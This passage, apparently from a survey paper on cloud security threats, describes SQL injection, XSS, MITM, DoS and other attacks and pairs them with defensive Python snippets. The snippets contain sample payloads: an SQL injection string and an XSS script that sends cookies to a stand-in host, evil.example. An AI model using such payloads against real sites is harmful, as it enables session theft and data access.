Virtualization in general increases the security of a cloud environment. With virtualization, a single machine can be divided into many virtual machines, providing better data isolation and safety against denial-of-service attacks [68]. The VMs (virtual machines) provide a security test-bed for the execution of untested code from un-trusted users. A hierarchical reputation system has been proposed in [61] for managing trust in a cloud environment.

5. THREATS TO SECURITY IN CLOUD COMPUTING

The chief concern in cloud environments is to provide security around multi-tenancy and isolation, giving customers more assurance than the mere "trust us" idea of clouds [62]. Survey works have been reported which classify security threats in the cloud based on the nature of the service delivery models of a cloud computing system [63]. However, security requires a holistic approach, and the service delivery model is only one of many aspects that need to be considered for a comprehensive survey of cloud security. Security at different levels, such as the network level, the host level and the application level, is necessary to keep the cloud up and running continuously; the same has been discussed in [64] for the Amazon EC2 cloud. In accordance with these different levels, various types of security breaches may occur, which have been classified in this section.

5.1 Basic Security

Web 2.0, a key technology enabling the use of Software as a Service (SaaS), relieves users of tasks like the maintenance and installation of software, and it is in widespread use. As the user community of Web 2.0 increases by leaps and bounds, security has become more important than ever for such environments [65, 67].

SQL injection attacks are those in which malicious code is inserted into a standard SQL query, through which attackers gain unauthorized access to a database and are able to read sensitive information [68]. Sometimes the attacker's input is misinterpreted by the website as legitimate user data and passed to the SQL server, which lets the attacker learn how the website functions and make changes to it. Various techniques, such as avoiding dynamically generated SQL in the code and using filtering techniques to sanitize user input, are used to counter SQL injection attacks. A proxy-based architecture for preventing SQL injection attacks, which dynamically detects and extracts users' inputs for suspected SQL control sequences, has been proposed in [69].
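The difference between splicing user input into the SQL text and passing it as a parameter can be seen in a few lines. This is a minimal sketch using Python's built-in sqlite3 module; the table and the attacker input are made up for illustration.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, is_admin INTEGER)")
conn.execute("INSERT INTO users VALUES ('alice', 1), ('bob', 0)")

malicious = "nobody' OR '1'='1"

# Vulnerable: the input becomes part of the SQL text itself, so the
# injected OR clause matches every row in the table.
rows = conn.execute(
    "SELECT name FROM users WHERE name = '%s'" % malicious).fetchall()
assert len(rows) == 2

# Safe: a parameterized query treats the input purely as data.
rows = conn.execute(
    "SELECT name FROM users WHERE name = ?", (malicious,)).fetchall()
assert rows == []   # no user is literally named that string
```

The placeholder (`?`) ensures the database driver never interprets the attacker's quotes and keywords as SQL, which is exactly the property that input-filtering techniques try to approximate.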

Cross-Site Scripting (XSS) attacks, which inject malicious scripts into web content, have become quite popular since the inception of Web 2.0. There are two methods of injecting the malicious code into the web page displayed to the user: stored XSS and reflected XSS. In a stored XSS, the malicious code is permanently stored in a resource managed by the web application, and the actual attack is carried out when the victim requests a dynamic page constructed from the contents of this resource [70]. In a reflected XSS, in contrast, the attack script is not permanently stored; it is immediately reflected back to the user [70].

Based on the type of services provided, a website can be classified as static or dynamic. Static websites do not suffer from many of the security threats that dynamic websites do; the very dynamism that lets dynamic websites provide manifold services to users also makes them prime victims of XSS attacks. It is quite often observed that, while working on the internet or surfing, web pages or pop-ups open up requesting to be clicked in order to view the content they contain. Either unknowingly (of the possible hazards) or out of curiosity, users click on these hazardous links, and thus the intruding third party gets control over the users' private information or hacks their accounts using the information made available to it. Various techniques, like Active Content Filtering, Content-Based Data Leakage Prevention Technology and Web Application Vulnerability Detection Technology, have already been proposed to prevent XSS attacks [71]. These technologies adopt various methodologies to detect security flaws and fix them. A blueprint-based approach that minimizes the dependency on web browsers for identifying untrusted content over the network has been proposed in [72].
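At its core, most XSS filtering reduces to escaping markup characters before user input is embedded in a dynamically generated page. A minimal sketch of that principle (not any of the specific technologies of [71]), using Python's standard library:

```python
import html

def render_comment(user_input: str) -> str:
    # Escaping turns markup characters (<, >, &, quotes) into inert
    # HTML entities before the text is embedded in the page, so any
    # injected <script> tag is displayed as text rather than executed.
    return "<p>%s</p>" % html.escape(user_input)

payload = "<script>location='http://evil.example/?c='+document.cookie</script>"
safe = render_comment(payload)
assert "<script>" not in safe        # the tag can no longer execute
assert "&lt;script&gt;" in safe      # it survives only as visible text
```

Production frameworks apply this escaping automatically in their template engines, precisely because relying on developers to call it by hand is error-prone.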

Another class of attacks, quite relevant to SaaS, is termed man-in-the-middle (MITM) attacks. In such an attack, an entity tries to intrude into an ongoing conversation between a sender and a client in order to inject false information and to learn the important data transferred between them. Tools such as Dsniff, Cain, Ettercap, Wsniff, Airjack, etc. are readily available for launching such attacks, so strong encryption technologies must be deployed to safeguard against them. A detailed study of preventing man-in-the-middle attacks has been presented in [73].
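In practice, the standard safeguard is an authenticated, encrypted channel: TLS with certificate and hostname verification prevents an interposed party from impersonating the server. A sketch using Python's standard ssl module (the fetch helper is an illustrative example, not a complete client):

```python
import socket
import ssl

# A default client context verifies the server certificate against the
# system's trusted CAs and checks that it matches the hostname -- the two
# checks that stop an interposed "man in the middle" from posing as the server.
ctx = ssl.create_default_context()
assert ctx.verify_mode == ssl.CERT_REQUIRED
assert ctx.check_hostname is True

def fetch_head(host: str, port: int = 443) -> bytes:
    """Illustrative helper: issue a HEAD request over a verified TLS channel."""
    with socket.create_connection((host, port), timeout=10) as raw:
        # wrap_socket raises ssl.SSLCertVerificationError if an attacker
        # presents a forged or mismatched certificate.
        with ctx.wrap_socket(raw, server_hostname=host) as tls:
            tls.sendall(b"HEAD / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n")
            return tls.recv(4096)
```

Disabling either check (as legacy code sometimes does with `CERT_NONE`) silently re-opens the MITM window, which is why it should never ship in production.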

A few important points, like evaluating software-as-a-service security, separating endpoint and server security processes, and evaluating virtualization at the endpoint, have been mentioned by Eric Ogren in an article at Security.com on tackling traditional security flaws [74].

Hence, security at different levels is necessary in order to ensure the proper implementation of a cloud computing environment: server access security, internet access security, database access security, data privacy security and program access security. In addition, we need to ensure data security at the network layer as well as at the physical and application layers to maintain a secure cloud.

5.2 Network Level Security

Networks are classified into different types, such as shared and non-shared, public or private, and small-area or large-area networks, and each of them has a number of security threats to deal with. While considering network level security, it is important to distinguish between public and private clouds: a private cloud is less vulnerable than a public cloud. Almost all organizations have a private network in place, so the network topology for a private cloud is already defined, and in most cases the security practices implemented in the organization's private network apply to the private cloud too. In the case of a public cloud implementation, however, the network topology might need to be changed in order to implement the security features, and the following points need to be addressed:

· Confidentiality and integrity of the data-in-transit need to be ensured while adopting a public cloud architecture.

· Proper access controls within the cloud need to be ensured.

o Migrating to a cloud exposes the resources to the Internet: data which has so far been hosted over a private network becomes accessible over the internet, which increases the chances of data leakage or a security breach and should be taken care of.

o It may happen that the security policies implemented inside the cloud are not up to date, and as a result other parties within the cloud are able to access data belonging to some other customer.

· Trusted encryption schemes and tokenization models need to be changed to enhance security in a public cloud.

We can now see why organizations are not moving their sensitive data to public clouds and are instead relying on private clouds. In addition to the concerns mentioned above, issues associated with network level security comprise DNS attacks, sniffer attacks, the issue of reused IP addresses, and Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks [75].

5.2.1 DNS Attacks

The Domain Name System (DNS) translates a domain name into an IP address, since domain names are much easier to remember; hence DNS servers are needed. But there have been cases when, having called a server by name, the user was routed to some other, malicious cloud instead of the one he asked for, and using raw IP addresses instead is not always feasible. Although DNS security measures such as the Domain Name System Security Extensions (DNSSEC) reduce the effects of DNS threats, there are still cases when these measures prove inadequate, for example when the path between a sender and a receiver gets rerouted through a malicious connection. It may happen that, even after all the DNS security measures have been taken, the route selected between the sender and receiver causes security problems [76].

5.2.2 Sniffer Attacks

These attacks are launched by applications which can capture packets flowing in a network; if the data transferred through these packets is not encrypted, it can be read, and there is a chance that vital information flowing across the network is traced or captured. A sniffer program, through the NIC (Network Interface Card), ensures that the data/traffic linked to other systems on the network also gets recorded; this is achieved by placing the NIC in promiscuous mode, in which it can track all data flowing on the same network. A malicious-sniffing detection platform based on ARP (Address Resolution Protocol) and RTT (round-trip time) can be used to detect a sniffing system running on a network [77].

5.2.3 Issue of Reused IP Addresses

Each node of a network is assigned an IP address, and the number of IP addresses that can be assigned is limited. A large number of cases related to the reused-IP-address issue have been observed lately. When a particular user moves out of a network, the IP address previously associated with him is assigned to a new user. This sometimes risks the security of the new user, as there is a certain time lag between the change of an IP address in DNS and the clearing of that address from DNS caches [25]. Hence, even though an old IP address has been assigned to a new user, the chance of the data being accessed by some other user is not negligible: the address still exists in the DNS cache, and the data belonging to one user may become accessible to another, violating the privacy of the original user.

5.2.4 BGP Prefix Hijacking

Prefix hijacking is a type of network attack in which a wrong announcement is made about the IP addresses associated with an autonomous system (AS), letting malicious parties get access to untraceable IP addresses. On the internet, IP space is allocated in blocks that remain under the control of ASs, and an autonomous system can announce the IP prefixes under its control to all its neighbours. These ASs communicate using the Border Gateway Protocol (BGP). Sometimes, due to an error, a faulty AS may wrongly announce the IPs associated with it; in such a case, the actual traffic gets routed to some IP other than the intended one, and data is leaked or reaches an unintended destination. A security system for autonomous systems has been explained in [78].

5.3 Application Level Security

Application level security refers to the usage of software and hardware resources to secure applications so that attackers are not able to get control over them and make changes to them at will. Nowadays, attacks are often launched in the disguise of a trusted user, and the system, considering the attacker a trusted user, allows full access to the attacking party and gets victimized. The reason behind this is that outdated network level security policies allow only authorized users to access a specific IP address. With technological advancement, these security policies have become obsolete: there have been instances when a system's security was breached by accessing the system in the disguise of a trusted user, and it is now quite possible to imitate a trusted user and corrupt entire data stores without being noticed.

Hence, it is essential to put higher-level security checks in place to minimize these risks. The traditional method of dealing with increased security issues has been to develop a task-oriented ASIC device which handles a specific task, providing a greater level of security with high performance [79]. But with application-level threats being dynamic and adaptable to the security checks in place, these closed systems have been observed to be slow in comparison to open-ended systems. The capabilities of a closed system and the adaptability of an open-ended system have been combined in security platforms based on the Check Point Open Performance Architecture using quad-core Intel Xeon processors [79]. Even in the virtual environment, companies like VMware are using Intel Virtualization Technology for a better performance and security base. It has been observed that websites are often secured at the network level and have strong security measures there, while security loopholes remain at the application level which allow information access to unauthorized users. Threats to application level security include XSS attacks, cookie poisoning, hidden-field manipulation, SQL injection attacks, DoS attacks, backdoor and debug options, CAPTCHA breaking, etc., resulting from the unauthorized usage of the applications.

5.3.1 Security Concerns with the Hypervisor

Cloud computing rests mainly on the concept of virtualization. In a virtualized world, the hypervisor, popularly known as the virtual machine monitor (VMM), is the controller that allows multiple operating systems to run on a system at a time, providing resources to each operating system such that they do not interfere with each other. As the number of operating systems running on a hardware unit increases, the security issues concerning those new operating systems also need to be considered. Because multiple operating systems run on a single hardware platform, it is not possible to keep track of all of them, and hence maintaining the security of the operating systems is difficult. A guest system may try to run malicious code on the host system, bring the system down, or take full control of the system and block access to other guest operating systems [80].

It cannot be denied that there are risks associated with sharing the same physical infrastructure among a set of multiple users: even one malicious user can pose a threat to the others using the same infrastructure [81]. Hence security with respect to the hypervisor is of great concern, as all the guest systems are controlled by it. If a hacker is able to get control over the hypervisor, he can make changes to any of the guest operating systems and get control over all the data passing through the hypervisor.

Various types of attacks can be launched by targeting different components of the hypervisor [82]. Based on an understanding of how the various components in the hypervisor architecture behave, an advanced cloud protection system can be developed by monitoring the activities of the guest VMs (virtual machines) and the inter-communication among the various infrastructure components [83, 84].

5.3.2 Denial of Service Attacks

A DoS attack is an attempt to make the services assigned to authorized users unavailable. In such an attack, the server providing the service is flooded with a large number of requests, and hence the service becomes unavailable to the authorized users. Sometimes, when we try to access a site, we find that, due to the overloading of the server with access requests, we are unable to reach the site and observe an error; this happens when the number of requests exceeds the server's capacity. The occurrence of a DoS attack increases bandwidth consumption besides causing congestion, making parts of the cloud inaccessible to users. The use of an Intrusion Detection System (IDS) is the most popular method of defence against this type of attack [85]. A defence federation is used in [31] for guarding against such attacks: each cloud is loaded with a separate IDS, and the different intrusion detection systems work on the basis of information exchange. In case a specific cloud is under attack, the co-operative IDS alerts the whole system; a decision on the trustworthiness of a cloud is taken by voting, and the overall system performance is not hampered.
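The detection step of such an IDS can be as simple as a per-source rate threshold over a sliding time window. The sketch below is a generic illustration of that rule, not the federation scheme of [31]; the limit and window values are made up.

```python
from collections import defaultdict, deque

class FloodDetector:
    """Flag any source exceeding `limit` requests within `window` seconds."""
    def __init__(self, limit: int, window: float):
        self.limit, self.window = limit, window
        self.hits = defaultdict(deque)   # source -> timestamps of recent requests

    def allow(self, source: str, now: float) -> bool:
        q = self.hits[source]
        while q and now - q[0] > self.window:
            q.popleft()                  # drop requests that left the window
        q.append(now)
        # False means the source looks like a flood: drop it and raise an alert.
        return len(q) <= self.limit

ids = FloodDetector(limit=100, window=1.0)
# 100 requests spread over 0.1 s stay within the limit...
assert all(ids.allow("10.0.0.5", t / 1000) for t in range(100))
# ...but the 101st request inside the same window is flagged.
assert ids.allow("10.0.0.5", 0.1) is False
```

Real IDSs such as SNORT layer signature matching and anomaly scoring on top of counters like this, but the thresholding idea is the common core.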

5.3.3 Cookie Poisoning

Cookie poisoning involves changing or modifying the contents of a cookie to gain unauthorized access to an application or a web page. Cookies basically contain the user's identity-related credentials, and once these cookies are accessible, their content can be forged to impersonate an authorized user. This can be avoided either by performing regular cookie clean-up or by implementing an encryption scheme for the cookie data [71].
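An alternative (or complement) to encrypting the cookie is to authenticate it: the server appends an HMAC tag computed with a secret key, so any poisoned cookie fails verification. A minimal sketch; the key and the cookie format are illustrative.

```python
import hashlib
import hmac

SECRET = b"server-side secret key"   # hypothetical key; never sent to the client

def sign_cookie(value: str) -> str:
    """Append an HMAC-SHA256 tag so tampering is detectable."""
    tag = hmac.new(SECRET, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}|{tag}"

def verify_cookie(cookie: str):
    """Return the cookie value if the tag checks out, else None."""
    value, _, tag = cookie.rpartition("|")
    expected = hmac.new(SECRET, value.encode(), hashlib.sha256).hexdigest()
    # compare_digest avoids leaking the tag through timing differences.
    return value if hmac.compare_digest(tag, expected) else None

cookie = sign_cookie("user=alice;role=user")
assert verify_cookie(cookie) == "user=alice;role=user"

# A poisoned cookie (role escalated to admin) fails verification.
forged = cookie.replace("role=user", "role=admin")
assert verify_cookie(forged) is None
```

The client can still read the cookie, but cannot alter it without the server-side key, which directly defeats the forgery described above.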

5.3.4 Hidden Field Manipulation

While accessing a web page, there are certain fields that are hidden; they contain page-related information and are basically used by developers. However, these fields are highly prone to attack by hackers, as they can be modified easily and posted back to the web page, which may result in severe security violations [86].

5.3.5 Backdoor and Debug Options

A common practice among developers is to enable the debug option while publishing a website, which lets them make developmental changes to the code and have them implemented on the website. Since these debug options facilitate back-end entry for the developers, and since they are sometimes left enabled unnoticed, they may provide a hacker with an easy entry into the website and let him make changes at the website level [87].

5.3.6 Distributed Denial of Service Attacks

DDoS may be called an advanced version of DoS: the important services running on a server are denied by flooding the destination server with more packets than the target server can handle. Unlike in a DoS attack, in a DDoS attack the flood is relayed from many different, already compromised, dynamic networks. The attackers can control the flow of information by making selected information available only at certain times; the amount and type of information available for public usage is thus clearly under the attacker's control [87].

A DDoS attack is run by three functional units: a master, a slave and a victim. The master, the attack launcher, is behind all these attacks; the slave is the network which acts as a launch pad for the master, providing the platform from which the master launches the attack on the victim. Hence it is also called a co-ordinated attack.

Basically, a DDoS attack operates in two stages. The first is the intrusion phase, in which the master compromises less important machines so that they can support the flooding of a more important target; the second is installing the DDoS tools and attacking the victim server or machine. A DDoS attack thus makes the service unavailable to authorized users, just as a DoS attack does, but differs in the way it is launched. A similar case of a Distributed Denial of Service attack was experienced by the CNN news channel website, leaving most of its users unable to access the site for a period of three hours [88].

In general, the approaches used to fight DDoS attacks involve extensive modification of the underlying network, and these modifications often become costly for the users. A swarm-based logic for guarding against DDoS attacks has been proposed in [87]; it provides a transparent transport layer through which common protocols such as HTTP, SMTP, etc. can pass easily. The use of an IDS in the virtual machine is proposed in [16] to protect the cloud from DDoS attacks: a SNORT-like intrusion detection mechanism is loaded onto the virtual machine for sniffing all traffic, incoming or outgoing. Another method commonly used to guard against DDoS is to have intrusion detection systems on all the physical machines which host the users' virtual machines [89]; this scheme has been shown to perform reasonably well in a Eucalyptus [90] cloud.

5.3.7 CAPTCHA Breaking

CAPTCHAs were developed in order to prevent the usage of internet resources by bots or computers. They are used to prevent spam and the over-exploitation of network resources by bots; even multiple website registrations, dictionary attacks, etc. by an automated program are prevented using a CAPTCHA.

Recently, however, it has been found that spammers are able to break the CAPTCHAs [91] provided by the Hotmail and Gmail service providers. They make use of the audio system meant to read out the CAPTCHA characters for visually impaired users, applying speech-to-text conversion software to defeat the test. In yet another instance of CAPTCHA breaking, it was found that net users are provided some form of
